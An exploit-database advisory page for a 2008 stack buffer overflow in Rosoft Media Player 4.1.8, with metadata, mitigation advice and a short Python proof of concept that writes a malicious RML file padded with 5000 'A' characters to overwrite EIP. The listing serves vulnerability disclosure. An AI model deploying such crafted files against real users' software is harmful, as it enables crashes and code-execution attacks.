header-logo
Suggest Exploit
vendor:
Media Player
by:
Wiktor Sierocinski
7.5
CVSS
HIGH
Stack Based Buffer Overflow
119
CWE
Product Name: Media Player
Affected Version From: 4.1.2008
Affected Version To: 4.1.2008
Patch Exists: Yes
Related CWE: N/A
CPE: a:rosoft:media_player:4.1.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Stack Based Buffer Overflow Vulnerability in Rosoft Media Player 4.1.8

This is a stack based buffer overflow vulnerability in Rosoft Media Player 4.1.8. It is similar to one discovered by Juan Pablo Lopez Yacubian. This vulnerability concerns RML files, and it is possible to overwrite EIP. A proof of concept code is provided which creates a malicious RML file with 5000 A characters.

Mitigation:

Update to the latest version of Rosoft Media Player, or use an alternative media player.
Source

Exploit-DB raw data:

Description:
This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian. 
This one concerns RML file. This is Stack Based Buffer Overflow vulerability - we can ovewrite EIP. I hope that it was not reported before. 

Author: Wiktor Sierocinski
POC:

#!/usr/bin/python

content = (
"#EXTINF:Played=0\n" + "A" * 5000 + "\n"
)

fd = open("music.rml","w");
fd.write(content)
fd.close();

print "RML FILE CREATED"

# milw0rm.com [2008-03-15]

Navigation

Suggest Exploit

Services By CQR